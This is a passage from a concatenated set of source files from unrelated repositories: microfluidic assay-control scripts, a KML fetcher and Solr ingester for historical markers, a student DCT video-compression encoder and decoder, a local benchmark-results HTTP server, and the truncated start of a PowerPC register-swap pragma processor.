vc.closeValves(devices, bbsaValve + inletValve)
vc.openValves(devices, bufferValve + wasteValve)
time.sleep(30)
eh.scriptlogger.info('6/18. Done flowing PBS to waste. Flushing PBS through device \
with buttons open for 10min')
vc.closeValves(devices, wasteValve)
vc.openValves(devices, inletValve)
time.sleep(600)
eh.scriptlogger.info('7/18. Done flushing PBS through devices. \
Flowing neutravidin through inlet tree to waste for 30s')
vc.closeValves(devices, bufferValve + inletValve)
vc.openValves(devices, naValve + wasteValve)
time.sleep(30)
eh.scriptlogger.info('8/18. Done flushing Neutravidin to waste. \
Flowing Neutravidin through devices with buttons open for 30min')
vc.closeValves(devices, wasteValve)
vc.openValves(devices, inletValve)
time.sleep(1800)
eh.scriptlogger.info('9/18. Done flowing Neutravidin through devices. \
Flowing PBS through devices with buttons open for 10min')
vc.closeValves(devices, naValve)
vc.openValves(devices, bufferValve)
time.sleep(600)
eh.scriptlogger.info('10/18. Done flowing PBS through devices and closed buttons. \
Flowing bBSA through the device for another 35min (quench walls only)')
vc.closeValves(devices, bufferValve + buttonValves)
vc.openValves(devices, bbsaValve)
time.sleep(2100)
eh.scriptlogger.info('11/18. Done flowing bBSA through devices. \
Flowing PBS through the device for 10min. **NEXT STEP IS ANTIBODY FLOWING**')
vc.closeValves(devices, bbsaValve)
vc.openValves(devices, bufferValve)
time.sleep(600)
eh.scriptlogger.info('12/18. Done flowing PBS through devices and closed inlet. \
Flowing Antibody through inlet tree to waste for 30s')
vc.closeValves(devices, bufferValve + inletValve)
vc.openValves(devices, antibodyValve + wasteValve)
time.sleep(30)
eh.scriptlogger.info('13/18. Done flowing Antibody through inlet tree. Flowing \
Antibody through device for 2min')
vc.closeValves(devices, wasteValve)
vc.openValves(devices, inletValve)
time.sleep(120)
eh.scriptlogger.info('14/18. While flowing Antibody through devices, opened buttons. \
Flowing for 13.3min')
vc.openValves(devices, buttonValves)
time.sleep(800)
eh.scriptlogger.info('15/18. Closed buttons while flowing Antibody through device for 30s')
vc.closeValves(devices, buttonValves)
time.sleep(30)
eh.scriptlogger.info('16/18. Done flowing Antibody through device. Flowing PBS through \
inlet tree to waste for 30s')
vc.closeValves(devices, antibodyValve + inletValve)
vc.openValves(devices, bufferValve + wasteValve)
time.sleep(30)
eh.scriptlogger.info('17/18. Done flowing PBS to waste. Flowing PBS through device for 10min')
vc.closeValves(devices, wasteValve)
vc.openValves(devices, inletValve)
time.sleep(600)
eh.scriptlogger.info('18/18. Closed the outlets')
vc.closeValves(devices, outlet)
eh.scriptlogger.info('>> Done with device patterning')
def flowSubstrateStartAssay(deviceName, substrateInput, KineticAcquisition,
equilibrationTime = 600, treeFlushTime = 20, postEquilibrationImaging = False,
performImaging = True, postEquilibImageChanExp = {'4egfp':[500]}, scanQueueFlag = False):
"""Performs a standard enzyme turnover assay.
Flows substrate, exposes buttons and closes sandwiches,
performs imaging at specified timesteps
Rev. 102817, DM
Args:
substrateInput (str): valve name of input
deviceName (str): name of device
equilibrationTime (int): time to flush device before assay
Returns:
None
"""
sendToQueue = scanQueueFlag
inputValve = substrateInput[:-1]
eh.scriptlogger.info('>> Flowing substrate, starting assay for \
device {} in lines {}'.format(deviceName, str(substrateInput)))
deviceNumber = str(deviceName[-1])
#Flush the inlet tree
eh.scriptlogger.info('The inlet tree wash started for substrate in ' + str(substrateInput))
vc.returnToSafeState([deviceName])
vc.openValves([deviceName], [inputValve, 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for substrate in ' + str(substrateInput))
#Expose chip to substrate, equilibrate for equilibrationTime
eh.scriptlogger.info('Chip equilibration started for substrate in ' + str(substrateInput))
if inputValve == 'w': #For the instance where the waste line is the input
pass
else:
vc.closeValves([deviceName], ['w'])
vc.openValves([deviceName], ['in', 'out', 's1', 's2'])
time.sleep(equilibrationTime)
eh.scriptlogger.info('Chip equilibration done for substrate in ' + str(substrateInput))
if postEquilibrationImaging:
if sendToQueue == True:
args = [eh.rootPath,
postEquilibImageChanExp,
deviceName,
KineticAcquisition.note.replace(" ", "_")+'_PreAssay_ButtonQuant',
eh.posLists[deviceName]]
kwargs = {wrappingFolder: True}
ic.hardwareQueue.put((args, kwargs))
else:
ic.scan(eh.rootPath,
postEquilibImageChanExp,
deviceName,
KineticAcquisition.note.replace(" ", "_")+'_PreAssay_ButtonQuant',
eh.posLists[deviceName],
wrappingFolder = True)
#Close things to prep for assay, and open buttons
vc.closeValves([deviceName], [substrateInput[:-1], 'in', 'out', 's1', 's2'])
time.sleep(0.5)
vc.openValves([deviceName], ['b1', 'b2'])
#Start the assay
if performImaging:
KineticAcquisition.startAssay(eh.rootPath,
eh.posLists[deviceName],
scanQueueFlag = sendToQueue)
def makeAssayTimings(numLinearPoints = 5, totalPoints = 15, scanTime = 90, totalTime = 3600):
"""
"""
logPoints = totalPoints - numLinearPoints
baseTimes = []
pointDensity = 1
pointDenistyIncremener = 0.002
while sum(baseTimes) < totalTime:
pointDensity += pointDenistyIncremener
baseTimes = [scanTime] * numLinearPoints
logTimings = list(np.logspace(np.log10(scanTime),
np.log10(float(scanTime)**pointDensity),
num=logPoints,
dtype=int))
baseTimes.extend(logTimings)
baseTimes = [scanTime] * numLinearPoints
logTimings = list(np.logspace(np.log10(scanTime),
np.log10(float(scanTime)**(pointDensity-pointDenistyIncremener)),
num=logPoints,
dtype=int))
baseTimes.extend(logTimings)
return baseTimes
def flushInletTree(deviceNames, inputInlet, vacantInlets, flushTime):
"""
"""
# Close all the inlets AND the tree inlet (make no assumptions)
allInputs = ['hep', 'prot', 'ext2', 'ext1', 'ph', 'na', 'bb', 'w']
vc.closeValves(deviceNames, allInputs + ['in'])
indexes = range(len(allInputs))
indexesInputs = dict(zip(allInputs, indexes))
inputIndex = indexesInputs[inputInlet]
# Get the distance from the inputInlet to the vacantInlet mapped to the vacantInlet ID
vacantInletsOrganized = {}
for inlet in vacantInlets:
vacantInletsOrganized[abs(indexesInputs[inlet] - inputIndex)] = [inlet] # distance->port
vc.openValves(deviceNames, [inputInlet])
# Now from close to far, open the valve and wash for the flushTime
for inlet in sorted(vacantInletsOrganized.keys()):
vc.openValves(deviceNames, vacantInletsOrganized[inlet])
time.sleep(flushTime)
vc.closeValves(deviceNames, vacantInletsOrganized[inlet])
# Close all the inlets AND the tree inlet (again, make no assumptions)
vc.closeValves(deviceNames, [inputInlet])
|
FordyceLab/RunPack-STAMMP | runpack-stammp/assays.py | # title : assays.py
# description : Standard MITOMI Concurrent Imaging
# authors : <NAME>
# credits : <NAME>
# date : 20180520
# version update : 20200913
# version : 0.1.1
# python_version : 2.7
import time
from Queue import Queue
from runpack.io import HardwareInterface
from runpack.io import ExperimentalHarness as eh
from runpack import imagingcontrol as imaging
from runpack import mitomiprotocols as protocols
class Assay:
def __init__(self, dname, experimentalObject, inletPort, channelsExposures, assayTimesName, description,
equilibrationTime = 480, treeFlushTime = 15, postEquilibrationImaging = True, forConcurrency = False):
"""
Kinetic assay
Arguments:
(str) dname: device name ('d1' | 'd2' |'d3')
(ExperimentalHarness) experimentalObject:
(str) inletPort: name of port bearing substrate/reagent
(dict) channelsExposures: Dictionary of channels mapped to exposures
(e.g., {'2bf':[50, 500], '1pbp':[100, 200]})
(str) assayTimesName: Name of assay timing delay times in ExperimentalHarness
(str) description: Assay description
(int) equilibrationTime: Time (s) to equilibrate reaction chambers with substrate/reagent
(int) treeFlushTime: Time (s) to pre-flush the inlet tree with substrate/reagent
(bool) postEquilibrationImaging: flag to acquire chip image following equilibration
(bool) forConcurrency: flag to execute assay as part of concurrent imaging
Returns:
None
"""
self.dname = dname
self.description = description
self.inletPort = inletPort
self.experimentalObject = experimentalObject
self.assayTimesName = assayTimesName
self.forConcurrency = forConcurrency
self.channelsExposures = channelsExposures
self.assayParams = {'equilibrationTime': equilibrationTime, 'treeFlushTime': treeFlushTime,
'postEquilibrationImaging': postEquilibrationImaging}
self.acquisitionObject = imaging.KineticAcquisition(dname, channelsExposures,
experimentalObject.assayTimes[assayTimesName], description)
self.testParams()
def startAssay(self):
"""
Start kinetic assay
Arguments:
None
Returns:
None
"""
protocols.flowSubstrateStartAssay(self.dname, self.inletPort, self.acquisitionObject,
equilibrationTime = self.assayParams['equilibrationTime'], treeFlushTime = self.assayParams['treeFlushTime'],
postEquilibrationImaging = self.assayParams['postEquilibrationImaging'], scanQueueFlag = self.forConcurrency)
def testParams(self):
"""
Assay parameter error checking
Arguments:
None
Returns:
None
"""
if not self.dname in self.experimentalObject.posLists.keys():
raise ValueError('Device name incorrect or not added to experimental object')
if not self.inletPort[-1] == self.dname[-1]:
raise ValueError('Your inlet port either lacks a trailing digit or is for another device')
for channel in self.channelsExposures.keys():
if not channel in HardwareInterface.channels:
raise ValueError('Channel {} does not exist for hardware'.format(channel))
if not self.assayTimesName in self.experimentalObject.assayTimes:
raise ValueError('The AssayTimes name specified does not exist in experimental object. Check your spelling.')
class AssaySeries:
def __init__(self, assayList, offsets = None):
"""
General-purpose assay series.
Arguments:
(list) assayList: list of assays objects to start, in order
(list) offsets: list of assay start delay offsets (int)
Returns:
None
"""
self.dname = assayList[0].dname
self.assayList = assayList
self.assayQueue = self.scheduleAssays()
self.assayParams = self.assayList[0].assayParams
self.offsets = offsets
def scheduleAssays(self):
"""
Queue up assays for execution.
Arguments:
None
Returns:
(Queue) Queue of assays to perform
"""
assayQueue = Queue()
list(map(lambda k: assayQueue.put(k), self.assayList))
return assayQueue
def startAssays(self, scanQueueFlag = False):
"""
Start execution of the assay series
Arguments:
(bool) scanQueueFlag: flag to dequeue assays to the common scanqueue
Returns:
None
"""
if not self.offsets:
while not self.assayQueue.empty():
nextAssay = self.assayQueue.get()
nextAssay.startAssay()
else:
while not self.assayQueue.empty():
for offset in self.offsets:
time.sleep(offset)
nextAssay = self.assayQueue.get()
nextAssay.startAssay() #Except the backgrounded version
imaging.hardwareState += 1
class RiffledAssaySeries:
def __init__(self, assaySeriesDict):
"""
A Riffled (scheduled) Assay Series Class
Not yet implemented
"""
self.assaySeriesDict = assaySeriesDict
# self.initialOffset = self.calculateInitialOffset()
# self.otherOffsets = self.calculateOtherOffsets()
self.assaySchedules = self.scheduleRiffle()
def calculateInitialOffset(self):
"""
To be implemented
"""
return
def calculateOtherOffsets(self):
"""
To be implemented
"""
return
def startAssays(self):
"""
To be implemented
"""
imaging.hardwareBlockingFlag = True
imaging.hardwareState = 0
self.assaySchedules.resume()
time.sleep(0.2)
self.assaySchedules.resume_job('d1')
print('d1 jobs resumed')
time.sleep(0.2)
self.assaySchedules.resume_job('d2')
print('d2 jobs resumed')
imaging.startHardwareQueue()
self.assaySchedules.shutdow()
return
def scheduleRiffle(self):
"""
To be implemented
"""
startAssaySeries = lambda series: series.startAssays()
backgroundConfig = {'logger': eh.scriptlogger}
s = BackgroundScheduler(gconfig=backgroundConfig)
s.start()
s.pause()
for dname, assaySeries in self.assaySeriesDict.items():
assayArgs = [assaySeries]
s.add_job(startAssaySeries, id = dname, misfire_grace_time = 100, args = assayArgs, next_run_time = None)
return s
|
worleydl/solr-spatial-viz | indexer/fetcher.py | <reponame>worleydl/solr-spatial-viz<filename>indexer/fetcher.py<gh_stars>1-10
import urllib
baseUrl = "http://www.hmdb.org/gpx/kml.asp?State=%s"
with open('states.txt') as f:
content = f.readlines();
for state in content:
state = state.strip();
kml = urllib.URLopener()
print "Retreiving %s" % state
kml.retrieve(baseUrl % state, "data/%s.kml" % state)
|
worleydl/solr-spatial-viz | indexer/ingester.py | <reponame>worleydl/solr-spatial-viz<gh_stars>1-10
import urllib2
import xml.etree.ElementTree as ET
with open('states.txt') as f:
states = f.readlines();
for state in states:
state = state.strip()
print state
tree = ET.parse('data/%s.kml' % state)
root = tree.getroot()
invalidIds = [None, 'HMdb']
namespace = '{http://www.opengis.net/kml/2.2}'
solr = "http://localhost:8983/solr/hmdb/update"
# Document
for child in root:
# Placemark
for pm in child:
docId = pm.get('id');
if docId not in invalidIds:
name = pm.find('%sname' % namespace).text
desc = pm.find('%sdescription' % namespace).text
point = pm.find('%sPoint' % namespace)
coords = point.find('%scoordinates' % namespace).text[:-2]
coords = coords.split(',')
coords = "%s,%s" % (coords[1], coords[0])
add_xml = ET.Element('add');
xdoc = ET.SubElement(add_xml, 'doc')
field = ET.Element('field', name='id')
field.text = docId
xdoc.append(field)
field = ET.Element('field', name='name')
field.text = name
xdoc.append(field)
field = ET.Element('field', name='description')
field.text = desc
xdoc.append(field)
field = ET.Element('field', name='coords')
field.text = coords
xdoc.append(field)
try:
request = urllib2.Request(solr)
request.add_header('Content-Type', 'text/xml; charset=utf-8');
request.add_data(ET.tostring(add_xml))
response = urllib2.urlopen(request).read()
except:
print "Invalid location: %s %s" % (docId, name)
|
jack04060201/data-compression-practice | DC.py | import cv2 as cv,numpy as np, copy, time
#from sklearn.cluster import KMeans
from matplotlib import pyplot as plt
import code_t as cd
###############
blocksize =[8,8]
Q_m=np.float32(
[[ [16,11,10,16,24,40,51,61],
[12,12,14,19,26,58,60,55],
[14,13,16,24,40,57,69,56],
[14,17,22,29,51,87,80,62],
[18,22,37,56,68,109,103,77],
[24,35,55,64,81,104,113,92],
[49,64,78,87,103,121,120,101],
[72,92,95,98,112,100,103,99]],##Y
[ [17,18,24,47,99,99,99,99],
[18,21,26,66,99,99,99,99],
[24,26,56,99,99,99,99,99],
[47,66,99,99,99,99,99,99],
[99,99,99,99,99,99,99,99],
[99,99,99,99,99,99,99,99],
[99,99,99,99,99,99,99,99],
[99,99,99,99,99,99,99,99]]])##UV
frame_global=np.float32([])
M=0
#intra frame
#inter frame
n_mv=(0,0)
n_d=10000
my,mx=0,0
set={'dc':[],'ac':[]}
###############
def find_mv(block,x,y,p=0):
global frame_global,n_mv,n_d,my,mx
br,bc,bch=np.int32(block.shape)
r,c,clrc= np.int32(frame_global.shape)-np.int32(block.shape)
#print(r,c) #64-120
for i in range((y-1)*br,(y+1)*br):
for j in range((x-1)*bc,(x+1)*bc):
if(i >= 0 and j >= 0 and i < r and j<c):
#print(frame_global[i:i+br,j:j+bc,:]-block)
d = np.sum(np.abs(frame_global[i:i+br,j:j+bc,:]-block))
if n_d > d:
n_d = d
mx=j
my=i
n_mv=(y*blocksize[0]-my,x*blocksize[1]-mx)
if p==1: print(n_d,n_mv,(my,mx))
#return my,mx
def nearest_mv(mv,d,my,mx):
global n_mv,n_d
r=False
if d < n_d:
n_mv = mv
n_d = d
print(n_d,mv,my,mx)#x:bks,y:bks,mv:pixel
r=True
return n_d,r
def bksp(frame,bksize,funcs):
global n_mv,n_d,my,mx
if funcs[0]== find_mv: n_d=10000
m=1 if remix in funcs else 0
r,c,clrc= np.int32(np.array(frame.shape)/[bksize[0],bksize[1],1])
#print(r,c)
for i in range(0,r):
print('\t\t\t\t\t',i,'/',r-1,end='\r', flush=True)
for j in range(0,c):
p=0;
bk=frame[bksize[0]*i:bksize[0]*(i+1),bksize[1]*j:bksize[1]*(j+1),:]
if i==j and j==2:
p=0
for func in funcs:
if func==DCT: bk=func(bk,p=0,m=m)
elif (func == rebuild) or func == remix: func(idct=bk,i=i,j=j,bksize=bksize)
elif func == find_mv: func(bk,x=j,y=i,p=0)
'''if funcs[0]== find_mv:
print("n_mv",n_mv)
print("(my,mx)",(my,mx))
print("frame_global",np.array([my,mx]),np.array([my,mx])+np.array(bksize))
print("frame",np.array([my,mx])-np.array(n_mv),np.array([my,mx])-np.array(n_mv)+np.array(bksize))
show(frame_global[my:(my+bksize[0]),mx:(mx+bksize[1]),:],m=1,t=1,sc=40,s=1)
show(frame[my-n_mv[0]:(my+bksize[0])-n_mv[0],mx-n_mv[1]:(mx+bksize[1])-n_mv[1]],m=1,t=2,sc=40)'''
def shift(frame):
global n_mv
#print("shift",n_mv)
#show(frame,m=1,t=1)
frames=copy.deepcopy(frame)
#show(frames,m=1,t=2)
w,h,chl=frame.shape
ty=n_mv[0] if n_mv[0] >= 0 else 0
by=w if n_mv[0] >= 0 else n_mv[0] + w
lx=n_mv[1] if n_mv[1] >= 0 else 0
rx=h if n_mv[1] >= 0 else n_mv[1] + h
frames[ty:by,lx:rx,:]=frame[ty-n_mv[0]:by-n_mv[0],lx-n_mv[1]:rx-n_mv[1],:]
# show(frames,m=1,t=3)
return frames
def show(frame,s=None,t="T",m=0,sc=1):
r,c,chl=frame.shape
if m==1:
frame=cv.cvtColor(frame.astype('uint8'), cv.COLOR_YUV2BGR_YUY2)
if sc!=1:
frame=cv.resize(frame,(int(sc*c),int(sc*r)),interpolation=cv.INTER_LINEAR)
cv.imshow(str(t),frame)
cv.waitKey(s)
def DCT(bk,p=0,m=0):
r,c,chl = np.int32(bk.shape)
dct,idct,Qa,dQa=np.zeros([r,c,chl]),np.zeros([r,c,chl]),np.zeros([r,c,chl]),np.zeros([r,c,chl]);
for i in range(0,chl):
dct[:,:,i]=cv.dct(bk[:,:,i])
Qa[:,:,i]=np.int32(Q(dct[:,:,i],l=i))
f=Qa[:,:,i].flatten()
if m>=0:
#code(f[0],"ac")
#f=np.delete(f,0)
#print(f)
cd.code_reset()
zigzag(Qa[:,:,i].astype(np.int32),(r,c),cd.bks.append)
#print(cd.bks)
cd.code_block(np.int32(cd.bks))
#print('\t\t\tsize:',len(cd.fin),end='\r',flush=True)
#if len(cd.fin)<200: print(cd.fin)
#else:
dQa[:,:,i]=deQ(Qa[:,:,i],l=i)
idct[:,:,i]=cv.idct(dQa[:,:,i])
if p==1:
print(dct[:,:,0])
print(Qa[:,:,0])
print(dQa[:,:,0])
print(idct[:,:,0])
return idct
def Q(dct,l=0):
return dct/Q_m[l]
def deQ(Qa,l=0):
return Qa*Q_m[l]
def rebuild(idct,i,j,bksize):
global frame_global
frame_global[bksize[0]*i:bksize[0]*(i+1),bksize[1]*j:bksize[1]*(j+1),:]=idct
def remix(idct,i,j,bksize):
global frame_global
frame_global[bksize[0]*i:bksize[0]*(i+1),bksize[1]*j:bksize[1]*(j+1),:]=idct+frame_global[bksize[0]*i:bksize[0]*(i+1),bksize[1]*j:bksize[1]*(j+1),:]
def YUV422(frame):#
r,c,chl = np.int32(frame.shape)
uv=np.zeros([r,c])
y,u,v=cv.split(frame)
u = cv.resize(u, (c//2, r), interpolation=cv.INTER_LINEAR)
v = cv.resize(v, (c//2, r), interpolation=cv.INTER_LINEAR)
y = np.round(y).astype(np.uint8)
u = np.round(np.clip(u, 0, 255)).astype(np.uint8)
v = np.round(np.clip(v, 0, 255)).astype(np.uint8)
uv[:, 0::2] = u
uv[:, 1::2] = v
return np.dstack((y, uv)).astype('uint8')
def zigzag(arr,blocksize,func=print):
N=blocksize[0]#方形適用
i,j,d=0,0,False
for n in range(N):
func(arr[i,j])
for s in range(n):
i+= 1 if d else -1
j+= -1 if d else 1
func(arr[i,j])
if d: i+=1
else: j+=1
d= not d
i+= 1 if d else -1
j+= -1 if d else 1
for n in range(N-2,-1,-1):
func(arr[i,j])
for s in range(n):
i+= 1 if d else -1
j+= -1 if d else 1
func(arr[i,j])
if d: j+=1
else: i+=1
d= not d
############################################################
def main():
global frame_global,M
cam = cv.VideoCapture('MOV10s.mp4')
f_c=0
cd.clear_file()
while cam.isOpened():
ret,frame = cam.read()#BGR
if not ret: break
f_c+=1
#for f in range(0,2):###############
#print(f)if M==0:
# frame=cv.imread(str(f)+'.jpg') #<-------
frame = cv.resize(frame, (512, 288))
#frame = cv.resize(frame, (128, 72))
print("第",f_c,"幀,","%.2f" %(f_c/30),"秒",flush=True)
#show(frame,t="1")
frame=YUV422(cv.cvtColor(frame, cv.COLOR_BGR2YUV))
frame_global.resize(frame.shape)
if M==1:
#print("Find")
bksp(frame,blocksize,[find_mv])
#show(frame,m=1,t=2) #<-------
#show(shift(frame),m=1,t=1) #<-------
#print("Shift")
framesh=shift(frame)
frame=framesh-frame_global
#print(np.sum(frame))
#if np.sum(frame) > frame.shape[0]*frame.shape[1]*64:#1/4
# M=0
#else:
#print("P-frame")
#cd.code_mv(n_mv)
bksp(frame.astype(np.float32),blocksize,[DCT,remix])
if M==0:
#print("I-frame")
frame=np.float32(frame)
bksp(frame,blocksize,[DCT,rebuild])
#M=1
cd.write_file(cd.fin)
cd.fin=''
#show(frame_global,m=1,s=1,sc=10)
if __name__ == "__main__":
main() |
jack04060201/data-compression-practice | code_t.py | <filename>code_t.py
import numpy as np,math,struct
z_count=0
#DC:127 \ 7
#AC:+-64 / bits
EOB=8
cb={
'0':1,
'10':2,
'110':3,
'1110':4,
'11110':5,
'111110':6, #BLOCK為8*8,連續0長度最多63
'1111110':7, #DC最高127
'11111110':EOB #EOB
}
temp=''
test='101011010101110100001001'
fin=''
bks=[]
frame=[]
ct=0
mv=[]
testbks=np.int32([59, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
rebuild=np.int32([])
#I-frame 傳I->傳DC值->傳差異值
#P-frame 傳P->傳差異值 2bs | x2 | 3bs| 5 | 1bs| x1 | 3bs| 4 | 1bs| x0 | 2bs| -2 |
#傳差異值 傳0位數bits數->傳0位數->傳數值bits數->傳數值 00504-2 -> 10 | 10 | 110| 101| 0 | 1 | 110| 100| 0 | 0 | 10 | 01 | 24bits
# DC AC
def code_reset():
global bks,temp,z_count
bks=[]
temp=''
z_count=0
def split(s):
return [char for char in s]
def code_block(bk,m=0):
global ct,fin
ct =0
#print(bk)
for c in bk:
ct+=1
send_code(code(c))
#print(ct)
#if ct<64:
# print(ct)
send_code(list(cb)[EOB-1])#EOB
if len(fin)%8 != 0:
send_code((8-(len(fin)%8))*'1')
def code_mv(mv):
global fin
send_code(code(mv[0],sk_z=True))
send_code(code(mv[1],sk_z=True))
send_code(list(cb)[EOB-1])#EOB
if len(fin)%8 != 0:
send_code((8-(len(fin)%8))*'1')
def code(N,m=0,sk_z=False):
global z_count,fin,cb
#print(N,m)
if m==2:
return list(cb)[N-1]
if N==0 and m==0:
if m==0: z_count+=1; return -1
else:
if N==0 and sk_z and m==1: send_code('00'); return -1
r=int(math.log2(abs(N)))+1
if not sk_z:
send_code(code(z_count,m=1,sk_z=True))
z_count=0
send_code(code(r,m=2))
b=(pow(2,r)-1-abs(N)) if (N < 0 and m==0) else N
return format(b, '0'+str(r)+'b')
def send_code(b):
global fin
#print(b)
if b != -1 : fin += str(b); #print(str(b))
def match(b):
global temp,cb
#print('t',temp[:10],b)
temp+=b
if temp in cb:
c=cb[temp]
#print("bits:",c)
temp=''
return c
return -1
def decode(code,m=0):
global rebuild,mv
l=len(code)
b=int(code,2)
b=-(pow(2,l)-b-1) if code[0] == '0' and m==0 else b
#print(code,b)
if m==0: rebuild=np.hstack([rebuild , int(b)])
elif m==2: mv=np.hstack([mv , [0 for i in range(b)]]);print(mv)
else: rebuild=np.hstack([rebuild , [0 for i in range(b)]])
def decode_analyze(c):
global fin,temp
z=True
count=0
#print(c[:30])
while len(c)>0:
if count==64:
#print("EOB")
return c #EOB
r=match(c[0]) #解析bits數
if r==EOB:
#print("EOB")
return c #EOB
#if not r ==-1: print(r)
c.pop(0)
#print(c)
#print('r',r)
if r > 0:
#print(z)
count+=1
decode(''.join(c[:r]),m=z)
c=c[r:]
z=not z
temp=''
return c
def decode_mv(c):
global fin,temp,mv
count=0
while len(c)>0:
if count==2:
#print("EOB")
return c #EOB
r=match(c[0]) #解析bits數
print(r,count)
if r==EOB:
#print("EOB")
return c #EOB
c.pop(0)
if r > 0:
count+=1
decode(''.join(c[:r]),m=2)
c=c[r:]
temp=''
return c
def clear_file():
bin = open("test.bin", "wb")
bin.close()
def write_file(input):
bin = open("test.bin", "ab")
byte = int(input,2).to_bytes((len(input) + 7) // 8, byteorder='big')
bin.write(byte)
bin.close()
def read_file(f_name):
f = open(f_name, "rb")
b=f.read()
b=format(int.from_bytes(b, byteorder='big'),'0'+str(8*len(b))+'b')
print(b[:64])
b=split(str(b))
return b
def main():
global testbks,fin
code_block(testbks)
print('finally:',fin,'\nsize:',len(fin))
clear_file()
write_file(fin)
#print(fin)
b=read_file("test.bin")
#print(b)
#print(' '.join(map(lambda x: '{:08b}'.format(x), b)))
#print(format(int.from_bytes(b, byteorder='big'),'b'))
c = split(b)
decode_analyze(c)
print('Origin :',testbks)
rebuild.resize(64)
print('rebuild:',rebuild.astype(np.int32))
print('Same',np.all(testbks==rebuild))
if __name__ == "__main__":
main()
|
jack04060201/data-compression-practice | decoder.py | import code_t as cd
import DC,numpy as np
import cv2 as cv
size=[int(288/8),int(512/8),2]
frame=np.zeros((288,512,2))
preframe=np.zeros((288,512,2))
p=[0,0]
def decode_bks(s):
global frame,p,size,preframe
bks_count=0
b=cd.read_file(s)
#print(b[:64])
c = cd.split(b)
#print(len(c))
blk=np.zeros((8,8,2))
while len(c)>0:
#if c[0]: print("I-frame")
#else: print("P-frame")
#c.pop(0)
r=0
count=0
while r==0:
#print("block:",count,end='\r',flush=True)
for i in range(2):
blk[:,:,i],c=return_frame(c)
#blk=np.stack((idct, uv), axis=2)
r=rebuild(blk)
count+=1
DC.show(frame,m=1,s=1,sc=2)
#r=cd.decode_mv(c)
#print(r)
reset()
#preframe=frame
def reset():
global frame,p
p=[0,0]
#frame=np.zeros((72,128,2))
def rebuild(blk):
global frame,size,p
#print(p[0],size[0])
if p[0]==size[0]: return 1
#print(blk)
frame[ p[0]*8:(p[0]+1)*8 , p[1]*8:(p[1]+1)*8 ,:]+=blk
p[1]+=1
if p[1] >= size[1]: p[1]=0; p[0]+=1
return 0
def return_frame(c):
pre=len(c)
r=cd.decode_analyze(c)
c = r
c=c[(8-(pre-len(c))%8):]
#print('d',pre-len(c))
cd.rebuild.resize(64)
#print(cd.rebuild)
bks=dezigzag(cd.rebuild,(8,8))
cd.rebuild=np.int32([])
dQa = DC.deQ(bks)
idct =cv.idct(dQa)
return idct,c
def dezigzag(arr,blocksize,func=print):
N=blocksize[0]#方形適用
i,j,d=0,0,False
bks,c=np.zeros(blocksize),0
def set(i,j,c):
bks[i,j]=arr[c]
return c+1
for n in range(N):
c=set(i,j,c)
for s in range(n):
i+= 1 if d else -1
j+= -1 if d else 1
c=set(i,j,c)
if d: i+=1
else: j+=1
d= not d
i+= 1 if d else -1
j+= -1 if d else 1
for n in range(N-2,-1,-1):
c=set(i,j,c)
for s in range(n):
i+= 1 if d else -1
j+= -1 if d else 1
c=set(i,j,c)
if d: j+=1
else: i+=1
d= not d
#print(bks)
return bks
decode_bks("test.bin") |
safariragoli2/python-print | print.py | string = "hi"
print(string)
|
drewkerrigan/basho_bench | priv/results-browser.py | #!/usr/bin/env python
import http.server
import socketserver
import logging
import cgi
import base64
import argparse
import os
class ServerHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
logging.warning("======= GET STARTED =======")
logging.warning(self.headers)
http.server.SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
logging.warning("======= POST STARTED =======")
length = self.headers['content-length']
data = self.rfile.read(int(length))
# I don't know wtf is wrong with this handler, it is called twice
# on a page load and only saves one blank canvas and one of the 5 graphs
# (using content length to differentiate the requests for now)
with open(os.path.join("." , "summary_raw_py_" + length + ".txt"), 'wb') as fh:
fh.write(data)
with open(os.path.join("." , "summary_py_" + length + ".png"), 'wb') as fh:
fh.write(base64.b64decode(data.decode()))
self.send_response(200)
def startServer(host, port):
httpd = socketserver.TCPServer((host, port), ServerHandler)
print('Serving at: http://{host}:{port}'.format(host=host, port=port))
httpd.serve_forever()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Results generator')
parser.add_argument('--port', '-p', type=int, help='Port for results generator to bind to', default=8080, required=False)
parser.add_argument('--host', type=str, help='Host for results generator to bind to', default='localhost', required=False)
args = parser.parse_args()
startServer(args.host, args.port)
|
mparisi20/pragma_processor | pragma.py | # pragma.py
# By mparisi20
# github.com/mparisi20/pragma_processor
# #pragma regswap usage:
# #pragma regswap start end regA regB startFile
# start: absolute address of start of affected region (hex)
# end: absolute address of end of affected region (hex)
# regA: register to swap (r0-r31 or f0-f31)
# regB: register to swap (r0-r31 or f0-f31)
# startFile: absolute address of the first function provided by this file (hex)
#pragma iswap addrA addrB startFile
import os
import sys
import argparse
import subprocess
import tempfile
import re
# 10-bit extension field for instructions with opcode 31
op31_map = {
'mask': 0x3ff,
'data':
{
frozenset([0, 32, 4, 86, 470, 54, 278, 246, 1014, 982]): (11, 16),
frozenset([28, 60, 284, 476, 124, 444, 412, 316, 24, 792,
536, 119, 87, 375, 343, 311, 279, 55, 23, 247,
215, 439, 407, 183, 151, 790, 534, 918, 662, 533,
661, 20, 150, 631, 599, 567, 535, 759, 727, 983,
695, 663, 310, 438]): (6, 11, 16),
frozenset([26, 954, 922, 824, 597, 725]): (6, 11),
frozenset([19, 83, 339, 371, 144, 146, 467, 595, 210]): (6,),
frozenset([659, 242]): (6, 16),
frozenset([306]): (16,)
}
}
# lower 9 bits
op31_mask9_map = {
'mask': 0x1ff,
'data':
{
frozenset([266, 10, 138, 491, 459, 75, 11, 235, 40, 8, 136]): (6, 11, 16),
frozenset([234, 202, 104, 232, 200]): (6, 11)
}
}
# 10-bit extension field for instructions with opcode 63
op63_map = {
'mask': 0x3ff,
'data':
{
frozenset([14, 15, 12, 264, 72, 136, 40]): (6, 16),
frozenset([32, 0]): (11, 16),
frozenset([583, 711]): (6,)
}
}
# lower 5 bits
op63_mask5_map = {
'mask': 0x1f,
'data':
{
frozenset([21, 18, 20]): (6, 11, 16),
frozenset([25]): (6, 11, 21),
frozenset([26]): (6, 16),
